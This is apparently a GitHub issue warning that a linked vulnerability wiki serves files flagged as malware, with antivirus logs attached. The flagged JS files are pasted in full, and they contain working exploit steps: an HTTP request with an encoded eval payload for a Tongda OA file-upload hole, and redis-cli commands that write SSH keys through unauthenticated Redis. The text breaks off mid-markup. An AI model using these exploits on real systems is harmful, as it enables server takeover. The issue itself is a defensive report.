weekly
weekly copied to clipboard
Published
20 hours ago •
ruanyf
ruanyf
【安全告警】issue #2635 推荐资源页面中的链接包含恶意攻击载荷
issue #2635 推荐资源页面中的链接“PeiQi文库”包含恶意攻击载荷: http://wiki.peiqi.tech/assets/js/9.2369a4c5.js http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js http://wiki.peiqi.tech/assets/js/408.6bd2b286.js
火绒安全日志如下:
【3】2022-09-25 21:41:23,病毒防护,WEB扫描,发现病毒TrojanDownloader/PS.NetLoader.aw, 已阻止
病毒名称:TrojanDownloader/PS.NetLoader.aw
病毒ID:53F2750F99F235F6
病毒URL:http://wiki.peiqi.tech/assets/js/9.2369a4c5.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8
操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2022-09-25 21:41:05,病毒防护,WEB扫描,发现病毒HEUR:Backdoor/PHP.WebShell.d, 已阻止
病毒名称:HEUR:Backdoor/PHP.WebShell.d
病毒ID:38B63BB3B1F6D704
病毒URL:http://wiki.peiqi.tech/assets/js/408.6bd2b286.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8
操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2022-09-25 21:40:34,病毒防护,WEB扫描,发现病毒HEUR:Backdoor/PHP.WebShell.a, 已阻止
病毒名称:HEUR:Backdoor/PHP.WebShell.a
病毒ID:ED9F80E4A8E762B9
病毒URL:http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8
操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js内容如下:
(window.webpackJsonp=window.webpackJsonp||[]).push([[113],{1737:function(t,a,s){t.exports=s.p+"assets/img/1628303888717-4ffc91a6-e87e-4e00-8bd5-b2218bb0772a.70c7bdb3.png"},1738:function(t,a,s){t.exports=s.p+"assets/img/1630513004438-e5a73ef6-8d65-40a1-9a3c-3be30cd7d164.da74a076.png"},1739:function(t,a,s){t.exports=s.p+"assets/img/1630513044174-8139c404-4f11-404e-be04-42d86b407bdd.420a6145.png"},1740:function(t,a,s){t.exports=s.p+"assets/img/1630513283771-36cc86c7-a150-4834-be64-243b20938165.83dcea54.png"},2828:function(t,a,s){"use strict";s.r(a);var r=s(75),n=Object(r.a)({},(function(){var t=this,a=t.$createElement,r=t._self._c||a;return r("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[r("h1",{attrs:{id:"通达oa-v11-8-api-ali-php-任意文件上传漏洞"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#通达oa-v11-8-api-ali-php-任意文件上传漏洞"}},[t._v("#")]),t._v(" 通达OA v11.8 api.ali.php 任意文件上传漏洞")]),t._v(" "),r("h2",{attrs:{id:"漏洞描述"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞描述"}},[t._v("#")]),t._v(" 漏洞描述")]),t._v(" "),r("p",[t._v("通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器")]),t._v(" "),r("h2",{attrs:{id:"漏洞影响"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞影响"}},[t._v("#")]),t._v(" 漏洞影响")]),t._v(" "),r("a-checkbox",{attrs:{checked:""}},[t._v("通达OA v11.8")]),r("br"),t._v(" "),r("h2",{attrs:{id:"漏洞复现"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞复现"}},[t._v("#")]),t._v(" 漏洞复现")]),t._v(" "),r("p",[t._v("登陆页面")]),t._v(" "),r("p",[r("img",{attrs:{src:s(1737),alt:"img"}})]),t._v(" "),r("p",[t._v("像 api.ali.php 发送请求包")]),t._v(" "),r("div",{staticClass:"language-python line-numbers-mode"},[r("pre",{pre:!0,attrs:{class:"language-python"}},[r("code",[t._v("POST "),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("mobile"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("api"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("api"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("ali"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("php HTTP"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("1.1")]),t._v("\nHost"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" \nUser"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Agent"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" Go"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("http"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("client"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("1.1")]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Length"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" "),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("422")]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Type"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" multipart"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("form"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("data"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" boundary"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),t._v("502f67681799b07e4de6b503655f5cae\nAccept"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Encoding"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" gzip\n\n"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("502f67681799b07e4de6b503655f5cae\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Disposition"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" form"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("data"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" name"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"file"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" filename"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"fb6790f4.json"')]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Type"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" application"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("octet"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("stream\n\n"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v("{")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"modular"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"AllVariable"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(",")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"a"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw=="')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(",")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"dataAnalysis"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"{\\"a\\":\\"錦\',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\\"}"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v("}")]),t._v("\n"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("502f67681799b07e4de6b503655f5cae"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("\n")])]),t._v(" "),r("div",{staticClass:"line-numbers-wrapper"},[r("span",{staticClass:"line-number"},[t._v("1")]),r("br"),r("span",{staticClass:"line-number"},[t._v("2")]),r("br"),r("span",{staticClass:"line-number"},[t._v("3")]),r("br"),r("span",{staticClass:"line-number"},[t._v("4")]),r("br"),r("span",{staticClass:"line-number"},[t._v("5")]),r("br"),r("span",{staticClass:"line-number"},[t._v("6")]),r("br"),r("span",{staticClass:"line-number"},[t._v("7")]),r("br"),r("span",{staticClass:"line-number"},[t._v("8")]),r("br"),r("span",{staticClass:"line-number"},[t._v("9")]),r("br"),r("span",{staticClass:"line-number"},[t._v("10")]),r("br"),r("span",{staticClass:"line-number"},[t._v("11")]),r("br"),r("span",{staticClass:"line-number"},[t._v("12")]),r("br"),r("span",{staticClass:"line-number"},[t._v("13")]),r("br")])]),r("a-checkbox",{attrs:{checked:""}},[t._v("参数a base解码")]),r("br"),t._v(" "),r("a-checkbox",{attrs:{checked:""}},[t._v("ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file_put_contents('../../fb6790f4.php','<?php phpinfo();?>');")]),r("br"),t._v(" "),r("p",[r("img",{attrs:{src:s(1738),alt:"img"}})]),t._v(" "),r("p",[t._v("再发送GET请求写入文件")]),t._v(" "),r("div",{staticClass:"language-python line-numbers-mode"},[r("pre",{pre:!0,attrs:{class:"language-python"}},[r("code",[r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("inc"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("package"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("work"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("php?"),r("span",{pre:!0,attrs:{class:"token builtin"}},[t._v("id")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("myoa"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("attach"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("approve_center"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("2109")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("fb6790f4\n")])]),t._v(" "),r("div",{staticClass:"line-numbers-wrapper"},[r("span",{staticClass:"line-number"},[t._v("1")]),r("br")])]),r("p",[r("img",{attrs:{src:s(1739),alt:"img"}})]),t._v(" "),r("p",[t._v("其中请求中对 2109 为 年月,路径为 "),r("code",[t._v("/fb6790f4.php,")])]),t._v(" "),r("p",[r("img",{attrs:{src:s(1740),alt:"img"}})])],1)}),[],!1,null,null,null);a.default=n.exports}}]);
http://wiki.peiqi.tech/assets/js/9.2369a4c5.js内容如下:
(window.webpackJsonp=window.webpackJsonp||[]).push([[9],{1024:function(s,t,a){s.exports=a.p+"assets/img/1628511265889-a89c273a-fa98-458c-b7d0-8a61b9098cc2-20220415143203556.794335ca.png"},1025:function(s,t,a){s.exports=a.p+"assets/img/1628511872365-61010be1-642a-4a70-8390-1de94a771e5b-20220415143203424.c66d4dbb.png"},1026:function(s,t,a){s.exports=a.p+"assets/img/1628511715038-57addcaa-bed5-4db8-a030-acafc228ba79-20220415143203457.eef9b57a.png"},1027:function(s,t,a){s.exports=a.p+"assets/img/1628512967608-9d62672c-9db3-4b07-94ad-70d03edf02b7-20220415143203434.9897afb6.png"},1028:function(s,t,a){s.exports=a.p+"assets/img/1628513275098-e5bcd6c4-3c19-4aaa-b2c1-90bd3d3b4a4e-20220415143203451.151e7ac3.png"},1029:function(s,t,a){s.exports=a.p+"assets/img/1628514409894-848f4f59-3b45-449a-8566-c204aed32354-20220415143203297.fba85c78.png"},1030:function(s,t,a){s.exports=a.p+"assets/img/1628515307073-5d1f3553-587e-476a-9556-beb3c9eb54bf-20220415143203556.3c3cade0.png"},1031:function(s,t,a){s.exports=a.p+"assets/img/1628515979062-1d027d69-3100-4eb9-9496-43b0b15a7768-20220415143203717.9a8e8d57.png"},1032:function(s,t,a){s.exports=a.p+"assets/img/1628603729549-61622428-de4c-4dbf-abdb-7ceb5c0d6240-20220415143203493.808174aa.png"},1033:function(s,t,a){s.exports=a.p+"assets/img/1628608226504-a9981cc4-1dae-4c85-9468-39bd3f030305-20220415143203642.bd3538c3.png"},1034:function(s,t,a){s.exports=a.p+"assets/img/1628608233667-192fed23-55a2-43a8-88df-75cc7d9d0b9b-20220415143203584.357b75de.png"},1035:function(s,t,a){s.exports=a.p+"assets/img/1628609553023-5e320f71-cea1-4ade-ad72-f1e0f51f7f11-20220415143203567.5bb58bce.png"},1036:function(s,t,a){s.exports=a.p+"assets/img/1628609873998-b83c9a14-4307-45fb-8c50-f46b79d85f86-20220415143203676.f3e64db5.png"},1037:function(s,t,a){s.exports=a.p+"assets/img/1628609802263-2105839f-6645-428b-82d4-bbb75b3dadb9-20220415143203681.8b806788.png"},1038:function(s,t,a){s.exports=a.p+"assets/img/1628610432546-2e313488-1ab1-42f2-bf37-fb074693c30a-20220415151326919.eba8b536.png"},1039:function(s,t,a){s.exports=a.p+"assets/img/1628682645780-adbda105-6e56-481d-a4c9-b34e6bd5908b-20220415143203710.60230d0b.png"},2586:function(s,t,a){"use strict";a.r(t);var e=a(75),r=Object(e.a)({},(function(){var s=this,t=s.$createElement,e=s._self._c||t;return e("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[e("h1",{attrs:{id:"redis-6379端口"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#redis-6379端口"}},[s._v("#")]),s._v(" Redis 6379端口")]),s._v(" "),e("h2",{attrs:{id:"关于"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#关于"}},[s._v("#")]),s._v(" 关于")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器")]),e("br"),s._v(" "),e("h2",{attrs:{id:"攻击方法"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#攻击方法"}},[s._v("#")]),s._v(" 攻击方法")]),s._v(" "),e("p",[s._v("要成功的利用Redis未授权访问的漏洞需要如下几点")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis服务以root账户运行")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis无密码或弱密码进行认证")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis监听在0.0.0.0公网上或内网中")]),e("br"),s._v(" "),e("p",[s._v("首先可以使用 Nmap的检测脚本 对 Redis进行未授权检测")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("nmap "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("A")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("p "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v(" –script redis"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("info "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[s._v("也可以使用其他工具进行扫描")]),s._v(" "),e("p",[e("img",{attrs:{src:a(1024),alt:"img"}})]),s._v(" "),e("p",[s._v("连接数据库查看 info, 确定未授权访问")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("redis"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("cli "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("h "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("p "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1025),alt:"img"}})]),s._v(" "),e("p",[e("img",{attrs:{src:a(1026),alt:"img"}})]),s._v(" "),e("h2",{attrs:{id:"linux-获取权限"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#linux-获取权限"}},[s._v("#")]),s._v(" Linux 获取权限")]),s._v(" "),e("h3",{attrs:{id:"ssh公钥"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#ssh公钥"}},[s._v("#")]),s._v(" SSH公钥")]),s._v(" "),e("p",[s._v("生成密钥在攻击机中")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("ssh"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("keygen "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("t rsa\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1027),alt:"img"}})]),s._v(" "),e("p",[s._v("将公钥导入key.txt文件(前后用\\n\\n换行,避免和Redis里其他缓存数据混合)")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("echo")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("e "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\n\\n"')]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),s._v(" cat id_rsa"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("pub"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("echo")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("e "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\n\\n"')]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" key"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("txt\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1028),alt:"img"}})]),s._v(" "),e("p",[s._v("再把 key.txt 文件内容写入目标主机的缓冲里")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("cat key"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),e("span",{pre:!0,attrs:{class:"token class-name"}},[s._v("txt")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token class-name"}},[s._v("redis")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("cli "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("h "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("x set test \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1029),alt:"img"}}),s._v("\n再通过设置参数,写入指定文件")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("┌──"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("root💀kali"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("~")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("ssh"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n└─"),e("span",{pre:!0,attrs:{class:"token comment"}},[s._v("# redis-cli -h 192.168.0.126 -p 6379")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("root"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("ssh\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename authorized_keys\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" keys "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("*")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("1")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"test"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" get test\n"),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\n\\n\\nssh-rsa xxxxxxxxxxxx \\n\\n\\n\\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token 